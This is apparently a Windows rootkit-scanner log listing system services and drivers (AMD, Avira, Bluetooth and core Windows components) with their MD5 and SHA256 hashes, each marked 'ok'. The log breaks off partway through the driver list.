20:02:38.0157 0x0b14  [ 14A45BE6F5678339F0EC5752D9849410, DD0F60E96FAC68FBD5B86382E541408C613BD0F871D0E0A1EF9AB6E7B26E545C ] ALG             C:\WINDOWS\System32\alg.exe
20:02:38.0172 0x0b14  ALG - ok
20:02:38.0219 0x0b14  [ 6CF81DD5083D7F94A7E76E50429A949C, 19240502A6406924F889D1AFA975B975A300776D8B2D0557181DF13649622E2B ] AMD External Events Utility C:\WINDOWS\system32\atiesrxx.exe
20:02:38.0235 0x0b14  AMD External Events Utility - ok
20:02:38.0266 0x0b14  AMD FUEL Service - ok
20:02:38.0313 0x0b14  [ 7589DE749DB6F71A68489DCE04158729, 5F35EDD50737985595C9D6703237CA2ADE49AA5443331020899698EB5114A0FB ] AmdK8           C:\WINDOWS\System32\drivers\amdk8.sys
20:02:38.0328 0x0b14  AmdK8 - ok
20:02:39.0313 0x0b14  [ 71F8D8B977ACC5973FA042BF906E709F, 8106C5F5C8E40344CCCDB912845786DF287BDF068D7A6EF9D26B00FA1754C1BC ] amdkmdag        C:\WINDOWS\system32\DRIVERS\atikmdag.sys
20:02:40.0345 0x0b14  amdkmdag - ok
20:02:40.0486 0x0b14  [ 4AA027F91A8093B1CDF453B5394F6715, E6D15E959637C102A34F73F66BFDC38436575A2FEFFC3976ACF399A472F126A5 ] amdkmdap        C:\WINDOWS\system32\DRIVERS\atikmpag.sys
20:02:40.0517 0x0b14  amdkmdap - ok
20:02:40.0564 0x0b14  [ B46D2D89AFF8A9490FA8C98C7A5616E3, BE0765B5423B690E0F097FECD9717FAA95BFDFFDC6CF1B93DE5A19A1B7797879 ] AmdPPM          C:\WINDOWS\System32\drivers\amdppm.sys
20:02:40.0580 0x0b14  AmdPPM - ok
20:02:40.0611 0x0b14  [ D2BF2F94A47D332814910FD47C6BBCD2, FE273D77D119D958676E1197D9EA7B008E3B05C6192B1962A81D4223ED204C35 ] amdsata         C:\WINDOWS\system32\drivers\amdsata.sys
20:02:40.0611 0x0b14  amdsata - ok
20:02:40.0658 0x0b14  [ A8E04943C7BBA7219AA50400272C3C6E, 794C0BD12DF0392654E9A37AE4A24B5BE2D83F1F24F74DD48A1A0BF3AB8B1FF8 ] amdsbs          C:\WINDOWS\system32\drivers\amdsbs.sys
20:02:40.0689 0x0b14  amdsbs - ok
20:02:40.0705 0x0b14  [ CEA5F4F27CFC08E3A44D576811B35F50, 89DF64B81BD109BAABAE93A4603C1617241219F38DDAF325EFE6BD35FF6FD717 ] amdxata         C:\WINDOWS\system32\drivers\amdxata.sys
20:02:40.0705 0x0b14  amdxata - ok
20:02:40.0767 0x0b14  [ A2EFE3869B976296E097DEF368280F95, 121CD4A16146A9DF59D6E415181F48CA0D1DCD4D2B6BC4CBDABC2F3D296E28C6 ] amd_sata        C:\WINDOWS\system32\drivers\amd_sata.sys
20:02:40.0783 0x0b14  amd_sata - ok
20:02:40.0814 0x0b14  [ 625396421C29FB305C6C6235D01130B8, 3FAF8D3B530F1B74B2C9B0ED3377836746CE2D0A4008E1BC454095671AC9E1AF ] amd_xata        C:\WINDOWS\system32\drivers\amd_xata.sys
20:02:40.0830 0x0b14  amd_xata - ok
20:02:41.0142 0x0b14  [ 9FE1AC875A7AD7B7FF28FEC8B754968D, EEE04D4073E49332C85028B62E8A035EAA2284526A3F3820133492C8F8CBA3D5 ] AntiVirMailService C:\Program Files (x86)\Avira\Antivirus\avmailc7.exe
20:02:41.0189 0x0b14  AntiVirMailService - ok
20:02:41.0267 0x0b14  [ 58FB167B287CAA05F7DD5AA1018FD52C, D9EB68E1C2B99E5F59A0DA4C9FA46E15C6E470F7445E232C03C82790F546A6AA ] AntiVirSchedulerService C:\Program Files (x86)\Avira\Antivirus\sched.exe
20:02:41.0283 0x0b14  AntiVirSchedulerService - ok
20:02:41.0361 0x0b14  [ 58FB167B287CAA05F7DD5AA1018FD52C, D9EB68E1C2B99E5F59A0DA4C9FA46E15C6E470F7445E232C03C82790F546A6AA ] AntiVirService  C:\Program Files (x86)\Avira\Antivirus\avguard.exe
20:02:41.0377 0x0b14  AntiVirService - ok
20:02:41.0502 0x0b14  [ F857D22CEC14854D310C5596C8CE6006, 67448C506D3171D327A6CE3952E41BDC65587FEB45F510160A1DAFCA9491711E ] AntiVirWebService C:\Program Files (x86)\Avira\Antivirus\avwebg7.exe
20:02:41.0565 0x0b14  AntiVirWebService - ok
20:02:41.0658 0x0b14  [ 9DCB42905F1EBF9CEC57EE5DF0BDA965, 4C888AAD0DDE01565FD7FBB6B70A500158CF2E4CECF9ADD4AFD302A993587269 ] AppHostSvc      C:\WINDOWS\system32\inetsrv\apphostsvc.dll
20:02:41.0658 0x0b14  AppHostSvc - ok
20:02:41.0736 0x0b14  [ 415DD71628795197F7AFC176CBADC74E, 5F0359053A6CD6EE239139E0E6F46E1FA9A73F017C0CE9B7BC052216B2C846EC ] AppID           C:\WINDOWS\system32\drivers\appid.sys
20:02:41.0736 0x0b14  AppID - ok
20:02:41.0814 0x0b14  [ 34B2E222F82D05398DAE7203B36B6A2B, AC04BC6B5A36A6807FFE302E9ACF073342B4D76B0BB386249251CB3CA1852CE8 ] AppIDSvc        C:\WINDOWS\System32\appidsvc.dll
20:02:41.0846 0x0b14  AppIDSvc - ok
20:02:41.0877 0x0b14  [ 680BFB820C5A943AB709BAA2B1EF27F2, A51D2A7976A762FE470C13C6D1BA0319A0FB19C9E66BF02AA44F83EAEC7130F8 ] Appinfo         C:\WINDOWS\System32\appinfo.dll
20:02:41.0877 0x0b14  Appinfo - ok
20:02:41.0940 0x0b14  [ 35E28923A23ADABAA5A1B43256D0AB58, A5F3AF8BBEE58B2165BAFACC5FF8B167B55B020998D3D1565C2229ED8753B269 ] AppReadiness    C:\WINDOWS\system32\AppReadiness.dll
20:02:41.0986 0x0b14  AppReadiness - ok
20:02:42.0111 0x0b14  [ 573542B5E97772021B73E854DA861DAA, C3FD00FA28060F8D7CDFD455BBB5FF8239CB76DDFFF2BDAE6AA944674DD993D3 ] AppXSvc         C:\WINDOWS\system32\appxdeploymentserver.dll
20:02:42.0189 0x0b14  AppXSvc - ok
20:02:42.0221 0x0b14  [ 65045784366F7EC5FB4E71BCF923187B, 53C215C64FF12E44B097F7CB88E8482438CE0ACBD3C68D8FD38BA0D0D8747FAA ] arcsas          C:\WINDOWS\system32\drivers\arcsas.sys
20:02:42.0236 0x0b14  arcsas - ok
20:02:42.0393 0x0b14  [ AA2E8C6B8D7EA7BAF04C988801927F48, 4B82043F1B9C67CDCDC71102F7AEE05EEA8F9775A5CB33AE80F4DCDB42521C40 ] aspnet_state    C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
20:02:42.0471 0x0b14  aspnet_state - ok
20:02:42.0502 0x0b14  [ 74B14192CF79A72F7536B27CB8814FBD, 0CF6BBB63FFE0C12777664D80B2797923844C8392D0FD81D7962EE5EE2C3C3D9 ] atapi           C:\WINDOWS\system32\drivers\atapi.sys
20:02:42.0533 0x0b14  atapi - ok
20:02:42.0814 0x0b14  [ 2C7676F892E88FD190F08D98048C7C6C, 44C13C103F61DA4D1A3823D37344F8C9465A611A9560808CE928925FB69604F7 ] athr            C:\WINDOWS\system32\DRIVERS\athw8x.sys
20:02:43.0065 0x0b14  athr - ok
20:02:43.0143 0x0b14  [ 506907D2E7F3A5B67DBD39C00A788B7C, 618C91FB9F49C69F88A993F164D7E9E4B7CAD0F34DCF77CF0C6F259A28448171 ] AtiHDAudioService C:\WINDOWS\system32\drivers\AtihdW86.sys
20:02:43.0174 0x0b14  AtiHDAudioService - ok
20:02:43.0236 0x0b14  [ 431FE56F5A2F5937994CB2DA330B47DB, E5AED551529A21494114959251FDF566802DD6D9B9D86A937A0EECE53338CAC7 ] AudioEndpointBuilder C:\WINDOWS\System32\AudioEndpointBuilder.dll
20:02:43.0252 0x0b14  AudioEndpointBuilder - ok
20:02:43.0330 0x0b14  [ 0F03CC00645D7F841879A048787D6AC7, 3ECD2486157469F2EDB63D4868338D1445F2909153DF0AFFE432083730EEE3F5 ] Audiosrv        C:\WINDOWS\System32\Audiosrv.dll
20:02:43.0377 0x0b14  Audiosrv - ok
20:02:43.0455 0x0b14  [ A900ED612B02CB3A2A8028866ED62E72, 0A93B04E8796AC6F1B6C8C858F717A4C73C11BC0C99BF285A486E57DB30D7965 ] avgntflt        C:\WINDOWS\system32\DRIVERS\avgntflt.sys
20:02:43.0455 0x0b14  avgntflt - ok
20:02:43.0487 0x0b14  [ 45061BD6F11B80BF1C07A9253A659BF1, 9A1AFE963672E23F3C19FACE2CEB64766C964B165ECB26F36B6FB5730CEAFD2D ] avipbb          C:\WINDOWS\system32\DRIVERS\avipbb.sys
20:02:43.0502 0x0b14  avipbb - ok
20:02:43.0631 0x0b14  [ 17348FE28C0A0AB4A6CB86D177770335, 633FEDA61F62504534B47090EA142F73C5D80C0D52A22A6C81DF64CD3EAFDAA8 ] Avira.ServiceHost C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe
20:02:43.0663 0x0b14  Avira.ServiceHost - ok
20:02:43.0709 0x0b14  [ 390184FAD8FCC1B6DA25AEBAE928C3B6, 537B0E0FAE080B55D70E990BBA0F7F22903CA340F6A42039BAD617A8ECF59119 ] avkmgr          C:\WINDOWS\system32\DRIVERS\avkmgr.sys
20:02:43.0709 0x0b14  avkmgr - ok
20:02:43.0756 0x0b14  [ 83586138F23A4C284EB68AFC852D7AFA, 9ADE8924B4518ED0A8E3FC4CC3F9964BC05B5FF67F230A7FD0BDABCFFA0BB0C8 ] avnetflt        C:\WINDOWS\system32\DRIVERS\avnetflt.sys
20:02:43.0756 0x0b14  avnetflt - ok
20:02:43.0819 0x0b14  [ 3C6ED74AF41DD1A5585CE5EF3D00915F, A742F576407776634E5A8E49C60023FFDF395DE0B2DE36662A23F85B79405ED2 ] AxInstSV        C:\WINDOWS\System32\AxInstSV.dll
20:02:43.0850 0x0b14  AxInstSV - ok
20:02:43.0928 0x0b14  [ A4A73F631FE2AA2826FBE4A399B04DEF, 973AACE8DC8DA669D0DF20F17EFDEEABB90AA046AC980948D16A62D39A606A79 ] b06bdrv         C:\WINDOWS\system32\drivers\bxvbda.sys
20:02:43.0975 0x0b14  b06bdrv - ok
20:02:44.0006 0x0b14  [ 8CC7F7E4AFCBA605921B137ED7992C68, 71406E6D6E9964740A6D90B05329D5492BB90AF40E0630CF2FBF4BA4BA14F2DD ] BasicDisplay    C:\WINDOWS\System32\drivers\BasicDisplay.sys
20:02:44.0022 0x0b14  BasicDisplay - ok
20:02:44.0038 0x0b14  [ 38A82F4EE8C416A6744B6D30381ED768, 9EAAE5F43BA09359130AC04B1DCA0F5D4DF32ED89C02DC5CEB640918948847F7 ] BasicRender     C:\WINDOWS\System32\drivers\BasicRender.sys
20:02:44.0053 0x0b14  BasicRender - ok
20:02:44.0069 0x0b14  [ C1ABB0F7E3BEA48A0417BDF6FF14AB21, 1CAC63A1A0FB9855A27EE977794576A860F6650C9EF7667FFB27F2A2FF721857 ] bcmfn2          C:\WINDOWS\System32\drivers\bcmfn2.sys
20:02:44.0084 0x0b14  bcmfn2 - ok
20:02:44.0147 0x0b14  [ 77D760E9B477C21487C171F561497F98, 2393D466CEC863C771C5BB4CD81B251635DC084386134B8E13F74F3E1C6D68DF ] BDESVC          C:\WINDOWS\System32\bdesvc.dll
20:02:44.0194 0x0b14  BDESVC - ok
20:02:44.0241 0x0b14  [ EC19013E4CF87609534165DF897274D6, 8ED45537CF2D58D759A587CCBFDADD5580C7447B0C3B172CF19ECC7585E073FC ] Beep            C:\WINDOWS\system32\drivers\Beep.sys
20:02:44.0241 0x0b14  Beep - ok
20:02:44.0334 0x0b14  [ 7BCB00EA702F78EC74CD9699D85CE80B, 17241ADAA13051B560DB9FA9079CAE6321D5B49788B596C125DC912443B00421 ] BFE             C:\WINDOWS\System32\bfe.dll
20:02:44.0381 0x0b14  BFE - ok
20:02:44.0491 0x0b14  [ 48554994279BFE17A3D2B00076D0CB1A, 6521B1EC0BC6B01F63976370D89FE7DC2E7404899F68B6FAC37A9173B9C5D489 ] BITS            C:\WINDOWS\System32\qmgr.dll
20:02:44.0538 0x0b14  BITS - ok
20:02:44.0616 0x0b14  [ EBBCD5DFBB1DE70E8F4AF8FA59E401FD, 17BFFC5DF609CE3B2F0CAB4BD6C118608C66A3AD86116A47E90B2BB7D8954122 ] Bonjour Service C:\Program Files\Bonjour\mDNSResponder.exe
20:02:44.0631 0x0b14  Bonjour Service - ok
20:02:44.0694 0x0b14  [ 6B4FFFDDC618FCF64473CAA86E305697, 29EA66071D5822920F5C50533673ADAB5204F8B25C11027AD27450D881F1142D ] bowser          C:\WINDOWS\system32\DRIVERS\bowser.sys
20:02:44.0709 0x0b14  bowser - ok
20:02:44.0756 0x0b14  [ FA601515FF2B59F25FDD8EDB1D2A1104, 21DFB53241F8E880F7546B9ADF38F47D6AD0782EC7F8F0284ED69DE7CEF7DCB9 ] BrokerInfrastructure C:\WINDOWS\System32\bisrv.dll
20:02:44.0772 0x0b14  BrokerInfrastructure - ok
20:02:44.0834 0x0b14  [ BC111AADACD0BF59D56547461D13AB6E, 91E3619930C29EE4B2683683888BA7EE3CF6B1DDB0C19A14E0880470CBE40EF4 ] Browser         C:\WINDOWS\System32\browser.dll
20:02:44.0834 0x0b14  Browser - ok
20:02:44.0881 0x0b14  [ A8F23D453A424FF4DE04989C4727ECC7, AE4A9081395C7379F1C947EF8243F7609F90C843E086B8E77E1A2C06E36D4381 ] BthAvrcpTg      C:\WINDOWS\System32\drivers\BthAvrcpTg.sys
20:02:44.0897 0x0b14  BthAvrcpTg - ok
20:02:44.0959 0x0b14  [ 272A62B660A48AEF366F8A1836CED19F, 78EFAC6B1B2313482329BBFFBF0DDA6462BD88E5BE3C817C5E8E0EAF3074C925 ] BthHFEnum       C:\WINDOWS\System32\drivers\bthhfenum.sys
20:02:44.0975 0x0b14  BthHFEnum - ok
20:02:44.0991 0x0b14  [ 71FE2A48E4C93DDB9798C024880B6C07, 8E93DE29C61A5FA64216231228CB3C4A1A693FE87CAA2C070BCAD7BE2D8ED000 ] bthhfhid        C:\WINDOWS\System32\drivers\BthHFHid.sys
20:02:45.0006 0x0b14  bthhfhid - ok
20:02:45.0131 0x0b14  [ 9307A4B743D277C499CDA8E19E5687AC, 7A01989EC3D54581F292BDEDC9B9445F2ABD50165102617E3089BDD061C63A19 ] BthHFSrv        C:\WINDOWS\System32\BthHFSrv.dll
20:02:45.0163 0x0b14  BthHFSrv - ok
20:02:45.0225 0x0b14  [ EF4B9E7C9AD88C00C18A12B0D22D1894, 672537E75201E690D86CD65252B8AEF887C76EBD37AB0C419462D69164B350CC ] BTHMODEM        C:\WINDOWS\System32\drivers\bthmodem.sys
20:02:45.0241 0x0b14  BTHMODEM - ok
20:02:45.0288 0x0b14  [ 043A0F37631BF453F16D478B71320F46, C368296B802984F438852927B8A40EA3F4205724A05828F3173F08EC17228356 ] bthserv         C:\WINDOWS\system32\bthserv.dll
20:02:45.0319 0x0b14  bthserv - ok
20:02:45.0366 0x0b14  [ 2FA6510E33F7DEFEC03658B74101A9B9, 61C8C8E3F09B427711464C974EE22E1E01C48E10DB54A4EC9901F482FC36C978 ] cdfs            C:\WINDOWS\system32\DRIVERS\cdfs.sys
20:02:45.0366 0x0b14  cdfs - ok
20:02:45.0397 0x0b14  [ C6796EA22B513E3457514D92DCDB1A3D, 2B893F3950C6B913B934C2089B69F3B0B77F229AE1820907E598455CBB78139C ] cdrom           C:\WINDOWS\System32\drivers\cdrom.sys
20:02:45.0428 0x0b14  cdrom - ok
20:02:45.0475 0x0b14  [ 41C0D7B1A6D4AD119BA6AC0487EA5C8E, 516C2B34BA7507D0DA4148B4ABC0A8C36286570D4EA5C60B28647B1249C15018 ] CertPropSvc     C:\WINDOWS\System32\certprop.dll
20:02:45.0506 0x0b14  CertPropSvc - ok
20:02:45.0558 0x0b14  [ BE9936EDD3267FAAFF94A7835867F00B, 3CEEF2377D45ED38C7CD3CE4C746EC5EA7277EFEC728A5438F0EF5F62FC7C859 ] circlass        C:\WINDOWS\System32\drivers\circlass.sys
20:02:45.0574 0x0b14  circlass - ok
20:02:45.0636 0x0b14  [ 8EB7E70C2D348FE2476A2E3F2D585E3D, 2B5D407FACF1D049261026CC552A7C93B028A661B0F4E959815EAE7670054127 ] CLFS            C:\WINDOWS\system32\drivers\CLFS.sys
20:02:45.0668 0x0b14  CLFS - ok
20:02:45.0746 0x0b14  [ 075CCE75090786F124573A788C8656E6, AA188CFF2F8EE2D9F50701AB2315D24E15D7715FD84F5054D3FC175D4BD35734 ] CLVirtualDrive  C:\WINDOWS\system32\DRIVERS\CLVirtualDrive.sys
20:02:45.0761 0x0b14  CLVirtualDrive - ok
20:02:45.0808 0x0b14  [ EF6EF85DADC3184A10D8F2F7159973CB, 42FCB286CED95A5DEBC5C0C894FCBC4818A2C818BB71087142FB51A08A0BE96B ] CmBatt          C:\WINDOWS\System32\drivers\CmBatt.sys
20:02:45.0824 0x0b14  CmBatt - ok
20:02:45.0902 0x0b14  [ 5E5AB950693F2C6D6ACBEE3A74697ED7, 3790A7DD0AC65F47A697A577744FDFA4CC1CA3422884C84E499F97AC91BA84F3 ] CNG             C:\WINDOWS\system32\Drivers\cng.sys
20:02:45.0949 0x0b14  CNG - ok
20:02:45.0964 0x0b14  [ 03AAED827C36F35D70900558B8274905, 8E44A23C6013FFAE7769F99CAA3B1D6288DE00A38937F9056903AC265B503AFA ] CompositeBus    C:\WINDOWS\System32\drivers\CompositeBus.sys
20:02:45.0980 0x0b14  CompositeBus - ok
20:02:45.0996 0x0b14  COMSysApp - ok
20:02:46.0058 0x0b14  [ A1FF7DFBFBE164CF92603C651D304DD2, 470ACE5A75E64FC62C950037201199857E974803625DC73BEDBCF6FA4DDD496C ] condrv          C:\WINDOWS\system32\drivers\condrv.sys
20:02:46.0058 0x0b14  condrv - ok
20:02:46.0121 0x0b14  [ 6324F0D18FB52833BA64BC828E29054C, 04118FA1BDFC512F76E4A81FEF34C78B6BD98429DB1D65123B6802B4A1E30584 ] CryptSvc        C:\WINDOWS\system32\cryptsvc.dll
20:02:46.0136 0x0b14  CryptSvc - ok
20:02:46.0183 0x0b14  [ 315BA4BC19316D72B2E037534E048B93, 69613635DB23E6A935673B1025C2010ED3E195473D25368CF74234C4C36910BE ] dam             C:\WINDOWS\system32\drivers\dam.sys
20:02:46.0199 0x0b14  dam - ok
20:02:46.0293 0x0b14  [ A6F17C299A03BAFEFB9257C462A19E00, EB68967D28355271897166D7B6FD963D1E546D3C24AE1AEAAC561F94357A9345 ] DcomLaunch      C:\WINDOWS\system32\rpcss.dll
20:02:46.0339 0x0b14  DcomLaunch - ok
20:02:46.0418 0x0b14  [ 95E1ABFB27F8A62ED764805775F0D2F3, 692865DA60C93481E01592883678B2C51FD9AC9A835DFB00A8E3F2DFEE7AB0ED ] defragsvc       C:\WINDOWS\System32\defragsvc.dll
20:02:46.0449 0x0b14  defragsvc - ok
20:02:46.0527 0x0b14  [ FF086DEF5995558CCB1B5AAC2110195D, CED52FF01F9247BFDAFC5C7EFC538F8638146ED715574A422496EE0F846CB079 ] DeviceAssociationService C:\WINDOWS\system32\das.dll
20:02:46.0543 0x0b14  DeviceAssociationService - ok
20:02:46.0605 0x0b14  [ 2C02AFF8383D893F8DBEB07A84F6E77C, 7CC34BAC67E2988E3D16DD6EB6F6785CD2460E3EF7FBD0BD5F86E49793BD473E ] DeviceInstall   C:\WINDOWS\system32\umpnpmgr.dll
20:02:46.0621 0x0b14  DeviceInstall - ok
20:02:46.0668 0x0b14  [ A03F362C5557E238CBFA914689C77248, BAD0A1124E6A384C15028FBE121ADF650F7716442555AD3737B9EA1F58A69246 ] Dfsc            C:\WINDOWS\system32\Drivers\dfsc.sys
20:02:46.0668 0x0b14  Dfsc - ok
20:02:46.0746 0x0b14  [ 3EEAADA3125431980E5804ED7143458A, 381E12C83E3211C255B321D35536F4049D67E31061F8D82155E4D4509E97F43D ] Dhcp            C:\WINDOWS\system32\dhcpcore.dll
20:02:46.0761 0x0b14  Dhcp - ok
20:02:46.0902 0x0b14  [ 3ECB752A6963B1CBC9AD65ED89C8ACED, 1D47D2EBD2C8D2B9F8D2D12A5FD93E6B10335EB6B23252DDEA6DF2233655FA59 ] DiagTrack       C:\WINDOWS\system32\diagtrack.dll
20:02:46.0980 0x0b14  DiagTrack - ok
20:02:47.0058 0x0b14  [ 4D40C9B33F738797CF50E77CB7C53E85, 7BA341342A47DEB15B51971C97A5237ACD8BDAD9033F63DF0000892BE43F8E13 ] disk            C:\WINDOWS\system32\drivers\disk.sys
20:02:47.0058 0x0b14  disk - ok
20:02:47.0105 0x0b14  [ EB70A894708D1BC176AFD690FF06085F, 0DD2A97F5E1B38D1F7C0D44E50F09EA222B18B3B074CC9C8CD25A7526CB1A112 ] dmvsc           C:\WINDOWS\System32\drivers\dmvsc.sys
20:02:47.0121 0x0b14  dmvsc - ok
20:02:47.0183 0x0b14  [ 33ADFB7453BF3271463712C4BCE61AD1, A1DB30F874BA7B2C4C653494D70B46B94BF7D39D0DD8559F6CA7A14B676FD617 ] Dnscache        C:\WINDOWS\System32\dnsrslvr.dll
20:02:47.0199 0x0b14  Dnscache - ok
20:02:47.0293 0x0b14  [ 811EACBCC7C51A03AE11F13CC27B2AB6, FAB94F84950FFB7D3649BAFB8D96D43B880D7FDE8D5B879472AE26C4BC4203B0 ] dot3svc         C:\WINDOWS\System32\dot3svc.dll
20:02:47.0324 0x0b14  dot3svc - ok
20:02:47.0355 0x0b14  [ B99CB575986789A93A683DCF292A43A1, 6ACEA31C723B74003E106FC8303542FCC6DBC4952B6B523F6590D006BE57238D ] DPS             C:\WINDOWS\system32\dps.dll
20:02:47.0371 0x0b14  DPS - ok
20:02:47.0386 0x0b14  [ 00C594D5A1DBD22AD8B2902B9F6EFF94, 2920D62B5F7C49A8AFA80FCAD1E834BBAA670AEBDD7E6F21F0496D1D3CCB4E90 ] drmkaud         C:\WINDOWS\system32\drivers\drmkaud.sys
20:02:47.0402 0x0b14  drmkaud - ok
20:02:47.0449 0x0b14  [ 263625A4F616538EB867B6306A6590DB, 2A064720C247EAA3446EFDCC9E01D84CBA875905D78DFED0FBD62D1EE422D416 ] DsmSvc          C:\WINDOWS\System32\DeviceSetupManager.dll
20:02:47.0464 0x0b14  DsmSvc - ok
20:02:47.0591 0x0b14  [ E1BB0B6F00F470B451AB45EA13EBA0B3, 3A2FC2175B69A5EB98D6C2D563DBFDCB320647AB87A14E47FAE800423DCACDAB ] DXGKrnl         C:\WINDOWS\System32\drivers\dxgkrnl.sys
20:02:47.0716 0x0b14  DXGKrnl - ok
20:02:47.0794 0x0b14  [ E253530BD5EDE28F1FF6AF93C4D8034D, 787A70C3E946348F066FB8EB81FCE60157217D93FD78ADC631B5835E8D76A253 ] Eaphost         C:\WINDOWS\System32\eapsvc.dll
20:02:47.0809 0x0b14  Eaphost - ok
20:02:48.0075 0x0b14  [ 114BCFDF367FF37C3F1B0A96AF542E4D, D385BC1D91BC1406091C8C3691C07A90BD60EDE05B1384E5AA3506FCB909C857 ] ebdrv           C:\WINDOWS\system32\drivers\evbda.sys
20:02:48.0309 0x0b14  ebdrv - ok
20:02:48.0372 0x0b14  [ 382100E75B6F4668AEAEF228C6CEFFAD, 9C7229F10F11D18E1FED6395391A46225A84B421034B9AB6F81AF7430FDC556F ] EFS             C:\WINDOWS\System32\lsass.exe
20:02:48.0388 0x0b14  EFS - ok
20:02:48.0434 0x0b14  [ 43531A5993380CC5113242C29D265FD9, EE0076D96F7F3CF29884AC7A67C08A429115A7201354A1FB5DE45FD63ABB4960 ] EhStorClass     C:\WINDOWS\system32\drivers\EhStorClass.sys
20:02:48.0434 0x0b14  EhStorClass - ok
20:02:48.0481 0x0b14  [ 6F8E738A9505A388B1157FDDE7B3101B, 3696CA634102B41EEA11EB9DCA0B24439D8636AED4A7190C138C5E64A2EFB514 ] EhStorTcgDrv    C:\WINDOWS\system32\drivers\EhStorTcgDrv.sys
20:02:48.0513 0x0b14  EhStorTcgDrv - ok
20:02:48.0528 0x0b14  [ DFFFAE1442BA4076E18EED5E406FA0D3, 329FC6FB8D14BEACDBE2A5D4C496EDEA485E838B1DF27566E278F8F8E0D8E82E ] ErrDev          C:\WINDOWS\System32\drivers\errdev.sys
20:02:48.0544 0x0b14  ErrDev - ok
20:02:48.0638 0x0b14  [ F00C593994D57C75273F820653440536, 2DC986D9890EC907405FB2045E6F55ACC384169B45F0B56CCB1A953CF71D9A5D ] EventSystem     C:\WINDOWS\system32\es.dll
20:02:48.0669 0x0b14  EventSystem - ok
20:02:48.0747 0x0b14  [ 7729D294A555C7AEB281ED8E4D0E01E4, 7269E79D72CCE477AC108294D0DDFB59CF533B03C587599C5AB0507C43A0B6D4 ] exfat           C:\WINDOWS\system32\drivers\exfat.sys
20:02:48.0763 0x0b14  exfat - ok
20:02:48.0809 0x0b14  [ 7C4E0D5900B2A1D11EDD626D6DDB937B, 732F310F8F6016C56F432A81636B13CE0124A802FE8DD91287B618EED22C9A1D ] fastfat         C:\WINDOWS\system32\drivers\fastfat.sys
20:02:48.0825 0x0b14  fastfat - ok
20:02:48.0903 0x0b14  [ 304B6AEC4639A7CCCCF544C6BA6177B2, B75CDD52FD3890B3008E06C503945D1E36478F0EC5E067C8DBC2822D7935D24B ] Fax             C:\WINDOWS\system32\fxssvc.exe
20:02:48.0966 0x0b14  Fax - ok
20:02:49.0028 0x0b14  [ 5D8402613E778B3BD45E687A8372710B, EE9EA10805168D309A609B9019AEC5961EE46D18207B5E0EA2DE4064A5770AF8 ] fdc             C:\WINDOWS\System32\drivers\fdc.sys
20:02:49.0044 0x0b14  fdc - ok
20:02:49.0091 0x0b14  [ 020D2F29009F893ADEFF4405B4B44565, 9F8501064C72933D1442DA00E70392B30D0207EB7D60F50E6648FF363799E6F1 ] fdPHost         C:\WINDOWS\system32\fdPHost.dll
20:02:49.0091 0x0b14  fdPHost - ok
20:02:49.0122 0x0b14  [ E80D2EDD2F88B6E20076A0A4F5A5A245, E3CD6E0BE152B22E8A7340EFFD10CCDB1B632CD3EDF487E83F697D2E22A7D594 ] FDResPub        C:\WINDOWS\system32\fdrespub.dll
20:02:49.0138 0x0b14  FDResPub - ok
20:02:49.0169 0x0b14  [ 47AB7D16EDE434B934AA4D661456C2D5, D375A92FB3E4BB0A8DA5270DACC888E53FB9F514516039FE6DAE4D4EF6B9A970 ] fhsvc           C:\WINDOWS\system32\fhsvc.dll
20:02:49.0184 0x0b14  fhsvc - ok
20:02:49.0231 0x0b14  [ BCFD8B149B3ADF92D0DB1E909CAF0265, 002B085C131473642450176B4B8359F3E5B04350AFB659B9C0F9EB587D1181E7 ] FileInfo        C:\WINDOWS\system32\drivers\fileinfo.sys
20:02:49.0247 0x0b14  FileInfo - ok
20:02:49.0263 0x0b14  [ A1A66C4FDAFD6B0289523232AFB7D8AF, 0F5832F626BB62190D5F3A088CE6E048D8A400CCF9EA527F06973CAD96D3A81C ] Filetrace       C:\WINDOWS\system32\drivers\filetrace.sys
20:02:49.0278 0x0b14  Filetrace - ok
20:02:49.0309 0x0b14  [ BE743083CF7063C486A4398E3AEFE59A, 85796D89943DD6FE3932C1ED6CF01470C1B4DFD243C390B07055FFDA3C231551 ] flpydisk        C:\WINDOWS\System32\drivers\flpydisk.sys
20:02:49.0309 0x0b14  flpydisk - ok
20:02:49.0356 0x0b14  [ C1FB505A73FA2E9019D32444AB33B75A, 765F0635C18295855CA4C0394192E8B94BA2EA1C4D74F86B720358ABA019FFAA ] FltMgr          C:\WINDOWS\system32\drivers\fltmgr.sys
20:02:49.0403 0x0b14  FltMgr - ok
20:02:49.0544 0x0b14  [ 6C068E7207F183FF3647E45D2599E80C, D65C9888522CA29596D5C8BEFF42356F0310E812117E72C1D612BA089C0940D9 ] FontCache       C:\WINDOWS\system32\FntCache.dll
20:02:49.0623 0x0b14  FontCache - ok
20:02:49.0717 0x0b14  [ 1C52387BF5A127F5F3BFB31288F30D93, 90D13F60170CD74304F3036A90D596AA3E1E134455A780310BDF67AC7815F2E7 ] FontCache3.0.0.0 C:\WINDOWS\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
20:02:49.0733 0x0b14  FontCache3.0.0.0 - ok
20:02:49.0795 0x0b14  [ A7C31B168F371E8E6796219F23E354DB, C51C9BF568F1E96CBBE57D2432B38F93F40520086DDB6AAAAC48CBCD1691B441 ] FsDepends       C:\WINDOWS\system32\drivers\FsDepends.sys
20:02:49.0811 0x0b14  FsDepends - ok
20:02:49.0842 0x0b14  [ 09F460AFEDCA03F3BF6E07D1CCC9AC42, B832091BC9B2C2FE38A4BCA132ABB58251E851F21EC6F39636E73777AB9A5791 ] Fs_Rec          C:\WINDOWS\system32\drivers\Fs_Rec.sys
20:02:49.0842 0x0b14  Fs_Rec - ok
20:02:49.0920 0x0b14  [ F152D55E497E12256290C43B31C7D0CE, FFC54B14CCFBC1548948C07FB3866E40A11D0C05AC352BD000E71CEF053F6A6E ] fvevol          C:\WINDOWS\system32\DRIVERS\fvevol.sys
20:02:49.0967 0x0b14  fvevol - ok
20:02:49.0998 0x0b14  [ 9591D0B9351ED489EAFD9D1CE52A8015, AC64C236C3AE545FCE8ED44A4A87FB86265A453BA60026EC9A4DE2B631E99996 ] FxPPM           C:\WINDOWS\System32\drivers\fxppm.sys
20:02:50.0014 0x0b14  FxPPM - ok
20:02:50.0045 0x0b14  [ FC3EF65EE20D39F8749C2218DBA681CA, 12980F1DE99B25E6920A33556F3ABDA5EC9BFE4757BE602130B5E939D8D25CE3 ] gagp30kx        C:\WINDOWS\system32\drivers\gagp30kx.sys
